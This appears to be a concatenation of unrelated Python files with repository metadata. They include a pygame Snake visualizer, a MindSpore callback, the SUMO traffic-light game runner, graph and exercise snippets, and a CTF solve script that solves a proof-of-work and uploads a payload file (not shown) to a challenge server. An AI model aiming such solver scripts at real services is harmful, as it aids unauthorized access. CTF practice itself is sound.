import pygame from GameData import GameData from TrainingData import TrainingData from Field import Field class Visualization: def __init__(self, pixel_size: int, field: Field): self.current_print_y: int = 0 # PyGame stuff pygame.init() pygame.fastevent.init() self.clock = pygame.time.Clock() # Arbitrary decisions self._pixel_width: int = pixel_size self._pixel_height: int = pixel_size # Prepare something to show self.field: Field = field self.window = pygame.display.set_mode((field.width * pixel_size + 380, field.height * pixel_size + 40)) pygame.display.set_caption('AI Snake @mitutoyoctlg') self.font_style = pygame.font.SysFont("Arial", 16) self.field_position: tuple = (315, 15) self.text_color: list = [255, 255, 255] # Cache self.last_field = None def tick(self) -> None: self.clock.tick(0) pygame.display.flip() def reset(self): self.current_print_y = 5 def _draw_field(self, field: Field, offset=0): if self.last_field is None: self.last_field = Field(field.width, field.height) self.last_field.set_all_pixels_to([-1, -1, -1]) # ensures a repaint pygame.draw.rect(self.window, [50, 50, 50], pygame.Rect(self.field_position[0], self.field_position[1], field.width * self._pixel_width, field.height * self._pixel_height)) sizechange = 1 if offset > 0 else 0 for y in range(0, field.height): for x in range(0, field.width): pixel_color = field.field[y][x] if offset == 0: if pixel_color == self.last_field.field[y][x]: continue left = (x - offset) * self._pixel_width + self.field_position[0] + 1 + sizechange * 5 top = (y - offset) * self._pixel_height + self.field_position[1] + 1 + sizechange * 5 width = self._pixel_width - 2 - sizechange * 10 height = self._pixel_height - 2 - sizechange * 10 pygame.draw.rect(self.window, pixel_color, pygame.Rect(left, top, width, height)) # remember the pixel if original field if offset == 0: self.last_field.field[y][x] = pixel_color def display_visualization_stats(self): self.text_color = [0, 255, 0] fps = int(self.clock.get_fps()) self._print_in_window(f"{fps} fps") self._print_in_window("") def display_training(self, training: TrainingData): if training is None: return self.text_color = [0, 255, 255] self._print_in_window(f"Epoch: {training.epoch} / {training.max_epochs}") self._print_in_window(f"Steps walked: {training.number_of_steps_walked} / {training.max_number_of_steps}") self._print_in_window(f"Best score (snake length): {training.best_score}") self._print_in_window(f"Best steps walked: {training.best_steps_walked}") self._print_in_window(f"Total training steps (all epochs): {training.total_steps_walked}") self._print_in_window(f"Total food eaten (all epochs): {training.total_food_eaten}") self._print_in_window(f"Average food eaten (all epochs): {round((training.total_food_eaten / training.epoch) * 1000) / 1000}") self._print_in_window(f"ε : {int(training.epsilon * 100)}%") self._print_in_window("") def display_game(self, info: GameData): self.text_color = [128, 128, 255] self._print_in_window(f"Snake direction: {info.direction}") self._print_in_window(f"Snake head: {info.head_x} , {info.head_y}") self._print_in_window(f"Snake length (score): {info.snake_length}") self._print_in_window(f"") self._print_in_window(f"Food position: {info.food_x} , {info.food_y}") self._print_in_window(f"Food direction: {info.food_direction}") self._print_in_window(f"Distance to food in steps: {info.food_distance_in_steps}") self._print_in_window(f"Air-line distance to food: {info.air_line_distance}") self._print_in_window(f"") self._print_in_window(f"Wall distances:") self._print_in_window(f" {info.walldistance_n}") self._print_in_window(f"{info.walldistance_w} {info.walldistance_e}") self._print_in_window(f" {info.walldistance_s}") self._print_in_window(f"Distance to closest wall: {info.nearest_wall_distance}") self._print_in_window(f"Distance to wall in walking direction: {info.distance_to_wall_in_current_direction}") self._print_in_window("") self._draw_field(info.field) def _print_in_window(self, text: str) -> None: line_distance = 16 self.current_print_y += line_distance pixels = self.font_style.render(text + " ", True, self.text_color, [0, 0, 0]) self.window.blit(pixels, [5, self.current_print_y]) def add_layer(self, visualization_field): if visualization_field is not None: self._draw_field(visualization_field, 1)
46.212389
134
0.634623
d3c0698c06fb8aa6e7f973e111326d1789b2d201
308
py
Python
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
1
2021-11-05T07:48:26.000Z
2021-11-05T07:48:26.000Z
# This is to find the sum of digits of a number until it is a single digit def sum_of_digits(n): n = int(input()) # here n is the number if n % 9 != 0: print(n % 9) else: print("9") # This method reduces time complexity by a factor of n and also without using any loop
25.666667
86
0.613636
d3c1e06d5da6a9eccf9d261778767e37808ed7c6
4,474
py
Python
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """callbacks""" import time import numpy as np from mindspore.train.callback import Callback from mindspore.common.tensor import Tensor class StateMonitor(Callback): """StateMonitor""" def __init__(self, data_size, tot_batch_size=None, lrs=None, eval_interval=None, eval_offset=None, eval_engine=None, logger=None): super(StateMonitor, self).__init__() self.data_size = data_size self.tot_batch_size = tot_batch_size self.lrs = lrs self.epoch_num = 0 self.loss = 0 self.eval_interval = eval_interval self.eval_offset = eval_offset self.eval_engine = eval_engine self.best_acc = -1 self.best_acc_top5 = -1 self.best_i2t_recall = -1 self.best_t2i_recall = -1 self.mean_fps = 0.0 self.print = print if logger is not None: self.print = logger def step_end(self, run_context): cb_params = run_context.original_args() loss = cb_params.net_outputs if isinstance(loss, (tuple, list)): if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray): loss = loss[0] if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray): loss = np.mean(loss.asnumpy()) self.loss = loss def epoch_begin(self, run_context): self.epoch_time = time.time() def epoch_end(self, run_context): epoch_seconds = (time.time() - self.epoch_time) per_step_seconds = epoch_seconds / self.data_size print_str = "epoch[{}]".format(self.epoch_num) print_str += ', epoch time: {:.2f}s'.format(epoch_seconds) print_str += ', per step time: {:.4f}s'.format(per_step_seconds) print_str += ', loss={:.6f}'.format(self.loss) if self.lrs is not None: lr = self.lrs[(self.epoch_num + 1) * self.data_size - 1] print_str += ', lr={:.6f}'.format(lr) if self.tot_batch_size is not None: fps = self.tot_batch_size * self.data_size / epoch_seconds self.mean_fps = (self.mean_fps * self.epoch_num + fps) / (self.epoch_num + 1) print_str += ', fps={:.2f}'.format(fps) if (self.epoch_num + 1) % self.eval_interval == self.eval_offset: eval_start = time.time() self.eval_engine.eval() output = self.eval_engine.get_result() eval_seconds = time.time() - eval_start if output is not None: if isinstance(output, list): print_str += ', top1 accuracy={:.6f}'.format(float(output[0])) print_str += ', top5 accuracy={:.6f}'.format(float(output[1])) print_str += ', i2t_recall={:.6f}'.format(float(output[2])) print_str += ', t2i_recall={:.6f}'.format(float(output[3])) print_str += ', eval_cost={:.2f}'.format(eval_seconds) if float(output[0]) > self.best_acc: self.best_acc = float(output[0]) if float(output[1]) > self.best_acc_top5: self.best_acc_top5 = float(output[1]) if float(output[2]) > self.best_i2t_recall: self.best_i2t_recall = float(output[2]) if float(output[3]) > self.best_t2i_recall: self.best_t2i_recall = float(output[3]) else: print_str += ', accuracy={:.6f}'.format(float(output)) print_str += ', eval_cost={:.2f}'.format(eval_seconds) if float(output) > self.best_acc: self.best_acc = float(output) self.print(print_str) self.epoch_num += 1
41.045872
89
0.5827
d3d107629e018d079de059c29b5b2649cece9a04
21,159
py
Python
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
4
2020-11-13T02:35:56.000Z
2021-03-29T20:15:54.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
9
2020-12-09T02:12:39.000Z
2021-02-18T00:15:28.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
1
2020-11-20T19:31:26.000Z
2020-11-20T19:31:26.000Z
#!/usr/bin/env python # -*- coding: utf8 -*- # Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo # Copyright (C) 2010-2020 German Aerospace Center (DLR) and others. # This program and the accompanying materials are made available under the # terms of the Eclipse Public License 2.0 which is available at # https://www.eclipse.org/legal/epl-2.0/ # This Source Code may also be made available under the following Secondary # Licenses when the conditions for such availability set forth in the Eclipse # Public License 2.0 are satisfied: GNU General Public License, version 2 # or later which is available at # https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html # SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later # @file runner.py # @author Michael Behrisch # @author Jakob Erdmann # @date 2010-01-30 """ This script runs the gaming GUI for the LNdW traffic light game. It checks for possible scenarios in the current working directory and lets the user start them as a game. Furthermore it saves highscores to local disc and to the central highscore server. """ from __future__ import absolute_import from __future__ import print_function import os import subprocess import sys import re import pickle import glob try: import Tkinter except ImportError: import tkinter as Tkinter from optparse import OptionParser from xml.dom import pulldom from collections import defaultdict SUMO_HOME = os.environ.get('SUMO_HOME', os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..')) sys.path.append(os.path.join(SUMO_HOME, 'tools')) import sumolib # noqa _UPLOAD = False if "noupload" in sys.argv else True _SCOREFILE = "scores.pkl" if _UPLOAD: _TIMEOUT = 5 _SCORESERVER = "sumo.dlr.de" _SCORESCRIPT = "/scores.php?game=TLS&" _DEBUG = True if "debug" in sys.argv else False _SCORES = 30 _LANGUAGE_EN = {'title': 'Interactive Traffic Light', 'cross': 'Simple Junction', 'cross_demo': 'Simple Junction (Demo)', 'square': 'Four Junctions', 'grid6': 'Six Junctions', 'kuehne': 'Prof. Kühne', 'bs3d': '3D Junction Virtual World', 'bs3Dosm': '3D Junction OpenStreetMap', 'ramp': 'Highway Ramp', 'corridor': 'Corridor', 'A10KW': 'Highway Ramp A10', 'DRT': 'Demand Responsive Transport (new)', 'DRT2': 'DRT - Advanced (new)', 'DRT_demo': 'DRT - Demo', 'high': 'Highscore', 'reset': 'Reset Highscore', 'lang': 'Deutsch', 'quit': 'Quit', 'Highscore': 'Highscore', 'Congratulations': 'Congratulations!', 'your score': 'Your Score', 'Continue': 'Continue', } _LANGUAGE_DE = {'title': 'Interaktives Ampelspiel', 'cross': 'Einfache Kreuzung', 'cross_demo': 'Einfache Kreuzung (Demo)', 'square': 'Vier Kreuzungen', 'grid6': 'Sechs Kreuzungen', 'kuehne': 'Prof. Kühne', 'bs3d': '3D Forschungskreuzung Virtuelle Welt', 'bs3Dosm': '3D Forschungskreuzung OpenStreetMap', 'ramp': 'Autobahnauffahrt', 'A10KW': 'A10 KW', 'DRT': 'Bedarfsbus (neu)', 'DRT2': 'Bedarfsbus für Fortgeschrittene (neu)', 'DRT_demo': 'Bedarfsbus - Demo', 'corridor': 'Strecke', 'high': 'Bestenliste', 'reset': 'Bestenliste zurücksetzen', 'lang': 'Englisch', 'quit': 'Beenden', 'Highscore': 'Bestenliste', 'Congratulations': 'Gratulation!', 'your score': 'Deine Punkte', 'Continue': 'Weiter', } def printDebug(*args): if _DEBUG: print("DEBUG:", end=" ") for message in args: print(message, end=" ") print() if _UPLOAD: printDebug("import httplib...") try: import httplib # noqa printDebug("SUCCESS") except ImportError: printDebug("FAILED - disabling upload...") _UPLOAD = False if _UPLOAD: print("Highscore upload is enabled. To disable call this script with 'noupload' argument.") else: print("Upload is disabled.") def computeScoreFromWaitingTime(gamename): totalDistance = 0 totalFuel = 0 totalArrived = 0 totalWaitingTime = 0 complete = True for line in open(os.path.join(base, "%s.netstate.xml" % start.category)): m = re.search('<interval begin="0(.00)?" end="([^"]*)"', line) if m and float(m.group(2)) != start.gametime: print("error: incomplete output") complete = False m = re.search('sampledSeconds="([^"]*)".*speed="([^"]*)"', line) if m: totalDistance += float(m.group(1)) * float(m.group(2)) m = re.search('fuel_abs="([^"]*)"', line) if m: totalFuel += float(m.group(1)) m = re.search('arrived="([^"]*)"', line) if m: totalArrived += float(m.group(1)) m = re.search('waitingTime="([^"]*)"', line) if m: totalWaitingTime += float(m.group(1)) # doing nothing gives a waitingTime of 6033 for cross and 6700 for # square score = 10000 - totalWaitingTime return score, totalArrived, complete def computeScoreFromTimeLoss(gamename): totalArrived = 0 timeLoss = None departDelay = None departDelayWaiting = None inserted = None running = None waiting = None completed = False for line in open(gamename + ".log"): if "Simulation ended at time" in line: completed = True m = re.search('Inserted: ([0-9]*)', line) if m: inserted = float(m.group(1)) m = re.search('Running: (.*)', line) if m: running = float(m.group(1)) m = re.search('Waiting: (.*)', line) if m: waiting = float(m.group(1)) m = re.search('TimeLoss: (.*)', line) if m: timeLoss = float(m.group(1)) m = re.search('DepartDelay: (.*)', line) if m: departDelay = float(m.group(1)) m = re.search('DepartDelayWaiting: (.*)', line) if m: departDelayWaiting = float(m.group(1)) if not completed or timeLoss is None: return 0, totalArrived, False else: totalArrived = inserted - running if _DEBUG: print("timeLoss=%s departDelay=%s departDelayWaiting=%s inserted=%s running=%s waiting=%s" % ( timeLoss, departDelay, departDelayWaiting, inserted, running, waiting)) score = 10000 - int(100 * ((timeLoss + departDelay) * inserted + departDelayWaiting * waiting) / (inserted + waiting)) return score, totalArrived, True def computeScoreDRT(gamename): rideWaitingTime = 0 rideDuration = 0 rideStarted = 0 rideFinished = 0 tripinfos = gamename + ".tripinfos.xml" rideCount = 0 for ride in sumolib.xml.parse(tripinfos, 'ride'): if float(ride.waitingTime) < 0: if _DEBUG: print("negative waitingTime") ride.waitingTime = 10000 rideWaitingTime += float(ride.waitingTime) if float(ride.duration) >= 0: rideDuration += float(ride.duration) rideStarted += 1 if float(ride.arrival) >= 0: rideFinished += 1 rideCount += 1 if rideCount == 0: return 0, 0, False else: avgWT = rideWaitingTime / rideCount avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted score = 5000 - int(avgWT + avgDur) if _DEBUG: print("rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s" % ( rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur)) return score, rideCount, True def computeScoreSquare(gamename): rideWaitingTime = 0 rideDuration = 0 rideStarted = 0 rideFinished = 0 tripinfos = gamename + ".tripinfos.xml" rideCount = 0 for ride in sumolib.xml.parse(tripinfos, 'tripinfo'): if float(ride.waitingTime) < 0: if _DEBUG: print("negative waitingTime") ride.waitingTime = 10000 rideWaitingTime += float(ride.waitingTime) if ride.vType.startswith("ev"): rideWaitingTime += 10 * float(ride.waitingTime) if float(ride.duration) >= 0: rideDuration += float(ride.duration) rideStarted += 1 if float(ride.arrival) >= 0: rideFinished += 1 rideCount += 1 if rideCount == 0: return 0, 0, False else: avgWT = rideWaitingTime / rideCount avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted score = 1000 - int(avgWT + avgDur) if _DEBUG: print("rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s" % ( rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur)) return score, rideCount, True _SCORING_FUNCTION = defaultdict(lambda: computeScoreFromWaitingTime) _SCORING_FUNCTION.update({ 'A10KW': computeScoreFromTimeLoss, 'DRT': computeScoreDRT, 'DRT2': computeScoreDRT, 'DRT_demo': computeScoreDRT, 'square': computeScoreSquare, }) def loadHighscore(): if _UPLOAD: printDebug("try to load highscore from scoreserver...") try: conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT) conn.request("GET", _SCORESCRIPT + "top=" + str(_SCORES)) response = conn.getresponse() if response.status == httplib.OK: scores = {} for line in response.read().splitlines(): category, values = line.split() scores[category] = _SCORES * [("", "", -1.)] for idx, item in enumerate(values.split(':')): name, game, score = item.split(',') scores[category][idx] = (name, game, int(float(score))) printDebug("SUCCESS") return scores except Exception: printDebug("FAILED") try: return pickle.load(open(_SCOREFILE)) except Exception: pass return {} def parseEndTime(cfg): cfg_doc = pulldom.parse(cfg) for event, parsenode in cfg_doc: if event == pulldom.START_ELEMENT and parsenode.localName == 'end': return float(parsenode.getAttribute('value')) class IMAGE: pass class StartDialog(Tkinter.Frame): def __init__(self, parent, lang): Tkinter.Frame.__init__(self, parent) # variables for changing language self.parent = parent self._language_text = lang self.buttons = [] # misc variables self.name = '' # setup gui self.parent.title(self._language_text['title']) self.parent.minsize(250, 50) self.category = None # we use a grid layout with 4 columns COL_DLRLOGO, COL_START, COL_HIGH, COL_SUMOLOGO = range(4) # there is one column for every config, +2 more columns for control # buttons configs = sorted(glob.glob(os.path.join(base, "*.sumocfg"))) numButtons = len(configs) + 3 # button dimensions bWidth_start = 30 bWidth_high = 10 bWidth_control = 41 self.gametime = 0 self.ret = 0 # some pretty images Tkinter.Label(self, image=IMAGE.dlrLogo).grid( row=0, rowspan=numButtons, column=COL_DLRLOGO) Tkinter.Label(self, image=IMAGE.sumoLogo).grid( row=0, rowspan=numButtons, column=COL_SUMOLOGO) # 2 button for each config (start, highscore) for row, cfg in enumerate(configs): if "bs3" in cfg and not haveOSG: continue category = self.category_name(cfg) # lambda must make a copy of cfg argument button = Tkinter.Button(self, width=bWidth_start, command=lambda cfg=cfg: self.start_cfg(cfg)) self.addButton(button, category) button.grid(row=row, column=COL_START) button = Tkinter.Button(self, width=bWidth_high, command=lambda cfg=cfg: ScoreDialog(self, [], None, self.category_name(cfg), self._language_text) ) # .grid(row=row, column=COL_HIGH) self.addButton(button, 'high') button.grid(row=row, column=COL_HIGH) # control buttons button = Tkinter.Button( self, width=bWidth_control, command=high.clear) self.addButton(button, 'reset') button.grid(row=numButtons - 3, column=COL_START, columnspan=2) button = Tkinter.Button( self, width=bWidth_control, command=sys.exit) self.addButton(button, 'quit') button.grid(row=numButtons - 1, column=COL_START, columnspan=2) button = Tkinter.Button( self, width=bWidth_control, command=lambda: self.change_language()) self.addButton(button, 'lang') button.grid(row=numButtons - 2, column=COL_START, columnspan=2) self.grid() # The following three commands are needed so the window pops # up on top on Windows... self.parent.iconify() self.parent.update() self.parent.deiconify() def addButton(self, button, text): button["text"] = self._language_text.get(text, text) self.buttons.append((text, button)) def change_language(self): if self._language_text == _LANGUAGE_DE: self._language_text = _LANGUAGE_EN else: self._language_text = _LANGUAGE_DE for text, button in self.buttons: button["text"] = self._language_text[text] def category_name(self, cfg): return os.path.basename(cfg)[:-8] def start_cfg(self, cfg): # remember which which cfg was launched self.category = self.category_name(cfg) if _DEBUG: print("starting", cfg) self.gametime = parseEndTime(cfg) self.ret = subprocess.call( [guisimPath, "-S", "-G", "-Q", "-c", cfg, '-l', 'log', '--output-prefix', "%s." % self.category, '--duration-log.statistics', '--tripinfo-output.write-unfinished'], stderr=sys.stderr) if _DEBUG: print("ended", cfg) # compute score score, totalArrived, complete = _SCORING_FUNCTION[self.category](self.category) # parse switches switch = [] lastProg = {} tlsfile = os.path.join(base, "%s.tlsstate.xml" % start.category) if os.path.exists(tlsfile): for line in open(tlsfile): m = re.search(r'tlsstate time="(\d+(.\d+)?)" id="([^"]*)" programID="([^"]*)"', line) if m: tls = m.group(3) program = m.group(4) if tls not in lastProg or lastProg[tls] != program: lastProg[tls] = program switch += [m.group(3), m.group(1)] lang = start._language_text if _DEBUG: print(switch, score, totalArrived, complete) if complete: ScoreDialog(self, switch, score, self.category, lang) # if ret != 0: # quit on error # sys.exit(start.ret) class ScoreDialog: def __init__(self, parent, switch, score, category, lang): self.root = Tkinter.Toplevel(parent) # self.root.transient(parent) self.name = None self.switch = switch self.score = score self.category = category self.root.title(lang["Highscore"]) self.root.minsize(250, 50) haveHigh = False if category not in high: high[category] = _SCORES * [("", "", -1.)] idx = 0 for n, g, p in high[category]: if not haveHigh and p < score: Tkinter.Label( self.root, text=(str(idx + 1) + '. ')).grid(row=idx) self.name = Tkinter.Entry(self.root) self.name.grid(row=idx, sticky=Tkinter.W, column=1) self.scoreLabel = Tkinter.Label(self.root, text=str(score), bg="pale green").grid(row=idx, column=2) self.idx = idx haveHigh = True self.root.title(lang["Congratulations"]) idx += 1 if p == -1 or idx == _SCORES: break Tkinter.Label(self.root, text=(str(idx + 1) + '. ')).grid(row=idx) Tkinter.Label(self.root, text=n, padx=5).grid( row=idx, sticky=Tkinter.W, column=1) Tkinter.Label(self.root, text=str(p)).grid(row=idx, column=2) idx += 1 if not haveHigh: if score is not None: # not called from the main menue Tkinter.Label(self.root, text=lang['your score'], padx=5, bg="indian red").grid(row=idx, sticky=Tkinter.W, column=1) Tkinter.Label(self.root, text=str(score), bg="indian red").grid(row=idx, column=2) idx += 1 Tkinter.Button(self.root, text=lang["Continue"], command=self.save).grid( row=idx, column=2) # add QR-code for LNDW Tkinter.Label(self.root, image=IMAGE.qrCode).grid( row=1, column=3, rowspan=22) self.root.grid() self.root.bind("<Return>", self.save) # self.root.wait_visibility() # self.root.grab_set() if self.name: self.name.focus_set() # The following three commands are needed so the window pops # up on top on Windows... # self.root.iconify() # self.root.update() # self.root.deiconify() # self.root.mainloop() def save(self, event=None): if self.name and self.name.get(): name = self.name.get() high[self.category].insert( self.idx, (name, self.switch, self.score)) high[self.category].pop() self.name.destroy() self.name = None Tkinter.Label(self.root, text=name, padx=5, bg="pale green").grid(row=self.idx, sticky=Tkinter.W, column=1) try: f = open(_SCOREFILE, 'w') pickle.dump(high, f) f.close() except Exception: pass if _UPLOAD: printDebug("try to upload score...") try: conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT) conn.request("GET", _SCORESCRIPT + "category=%s&name=%s&instance=%s&points=%s" % ( self.category, name, "_".join(self.switch), self.score)) if _DEBUG: r1 = conn.getresponse() print(r1.status, r1.reason, r1.read()) printDebug("SUCCESS") except BaseException: printDebug("FAILED") self.quit() def quit(self, event=None): self.root.destroy() stereoModes = ( 'ANAGLYPHIC', 'QUAD_BUFFER', 'VERTICAL_SPLIT', 'HORIZONTAL_SPLIT') optParser = OptionParser() optParser.add_option("-s", "--stereo", metavar="OSG_STEREO_MODE", help="Defines the stereo mode to use for 3D output; unique prefix of %s" % ( ", ".join(stereoModes))) options, args = optParser.parse_args() base = os.path.dirname(sys.argv[0]) high = loadHighscore() guisimPath = sumolib.checkBinary("sumo-gui") haveOSG = "OSG" in subprocess.check_output(sumolib.checkBinary("sumo"), universal_newlines=True) if options.stereo: for m in stereoModes: if m.lower().startswith(options.stereo.lower()): os.environ["OSG_STEREO_MODE"] = m os.environ["OSG_STEREO"] = "ON" break lang = _LANGUAGE_EN if "OSG_FILE_PATH" in os.environ: os.environ["OSG_FILE_PATH"] += os.pathsep + \ os.path.join(os.environ.get("SUMO_HOME", ""), "data", "3D") else: os.environ["OSG_FILE_PATH"] = os.path.join( os.environ.get("SUMO_HOME", ""), "data", "3D") root = Tkinter.Tk() IMAGE.dlrLogo = Tkinter.PhotoImage(file='dlr.gif') IMAGE.sumoLogo = Tkinter.PhotoImage(file='sumo_logo.gif') IMAGE.qrCode = Tkinter.PhotoImage(file='qr_sumo.dlr.de.gif') start = StartDialog(root, lang) root.mainloop()
36.35567
112
0.565622
c30b8b72f076c5457f9f0e8c230a44a9cc7a8e5f
1,044
py
Python
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
web/Electroplating/solve.py
NoXLaw/RaRCTF2021-Challenges-Public
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
[ "MIT" ]
null
null
null
import requests import hashlib import uuid import binascii import os import sys def generate(): return uuid.uuid4().hex[:4], uuid.uuid4().hex[:4] def verify(prefix, suffix, answer, difficulty=6): hash = hashlib.sha256(prefix.encode() + answer.encode() + suffix.encode()).hexdigest() return hash.endswith("0"*difficulty) def solve(prefix, suffix, difficulty): while True: test = binascii.hexlify(os.urandom(4)).decode() if verify(prefix, suffix, test, difficulty): return test if len(sys.argv) < 2: print("Usage: solve.py http://host:port/") exit() s = requests.Session() host = sys.argv[1] data = s.get(host + "pow").json() print("Solving POW") solution = solve(data['pref'], data['suff'], 6) print(f"Solved: {solution}") s.post(host + "pow", json={"answer": solution}) r = s.post(host, files={"file": open('solve.htmlrs', 'rb')}) # r = s.post(host, files={"file": open('src/template.htmlrs', 'rb')}) print(r.text) try: print(r.text.split('\n')[14]) except: print("Blocked")
24.27907
90
0.644636
c351dec159890595ef75075c3943491ddc436720
892
py
Python
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
exercises/python/data-types/collections/default-dict.py
rogeriosantosf/hacker-rank-profile
d4b9c131524d138c415e5c5de4e38c6b8c35dd77
[ "MIT" ]
null
null
null
# In this challenge, you will be given 2 integers, m and n. # There are n words, which might repeat, in word group A. # There are m words belonging to word group B. # For each m words, check whether the word has appeared in group A or not. # Print the indices of each occurrence of m in group A. # If it does not appear, print -1. from collections import defaultdict if __name__ == '__main__': n, m = map(int, input().split()) groups = defaultdict(list) for _ in range(n): groups['A'].append(input()) for _ in range(m): groups['B'].append(input()) for letter in groups['B']: if letter in groups['A']: occur = [] for i in range(len(groups['A'])): if groups['A'][i] == letter: occur.append(i + 1) print(" ".join(map(str, occur))) else: print("-1")
30.758621
75
0.571749
6f50f82050e54f4868ea22dbd8655476c4e1c5f4
1,619
py
Python
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
1
2021-11-05T07:48:26.000Z
2021-11-05T07:48:26.000Z
""" Find the shortest path between two nodes in an unweighted undirected graph. Remember this is about finding the shortest path, not the shortest distance. For shortest distance you can simply calculate the level of nodes from the source vertex and that will give the answer. For shortest path, use the concept of parents of Bellman-Ford algorithm. Simply do a BFS and keep track of parents of each node. Then recursively print the parents of destination node until the source node. """ from collections import defaultdict class Graph: def __init__(self, vertices): self.vertices = vertices self.graph = defaultdict(list) def add_edge(self, u, v): self.graph[u].append(v) self.graph[v].append(u) def bfs(self, s): parent = [-1] * self.vertices visited = [False] * self.vertices visited[s] = True queue = [] queue.append(s) while queue: s = queue.pop(0) for i in self.graph[s]: if visited[i] == False: queue.append(i) parent[i] = s visited[i] = True return parent def shortest_path(self, source, dest): parent = self.bfs(source) while True: print(dest, end=' ') dest = parent[dest] if dest == source: break g = Graph(8) g.add_edge(0, 1) g.add_edge(0, 3) g.add_edge(1, 2) g.add_edge(3, 4) g.add_edge(3, 7) g.add_edge(4, 5) g.add_edge(4, 6) g.add_edge(4, 7) g.add_edge(5, 6) g.add_edge(6, 7) g.shortest_path(0, 7)
23.808824
89
0.594812
48cd470862b5566406b88bf33d5cc16654b91e0a
302
py
Python
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
jaswinder9051998/Resources
fd468af37bf24ca57555d153ee64693c018e822e
[ "MIT" ]
101
2021-12-20T11:57:11.000Z
2022-03-23T09:49:13.000Z
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
Sid-1164/Resources
3987dcaeddc8825f9bc79609ff26094282b8ece1
[ "MIT" ]
4
2022-01-12T11:55:56.000Z
2022-02-12T04:53:33.000Z
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py
Sid-1164/Resources
3987dcaeddc8825f9bc79609ff26094282b8ece1
[ "MIT" ]
38
2022-01-12T11:56:16.000Z
2022-03-23T10:07:52.000Z
""" 1. Write a function that accepts two integers num1 and num2. The function should divide num1 by num2 and return the quotient and remainder. The output can be rounded to 2 decimal places. """ def quot_rem(num1,num2): q = round((num1 / num2), 2) r = round((num1 % num2), 2) return (q,r)
30.2
100
0.68543
d28c7a51f180fe4d9711b5cf099c91ea2d70c774
580
py
Python
python/asyncio/tasks.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/asyncio/tasks.py
zeroam/TIL
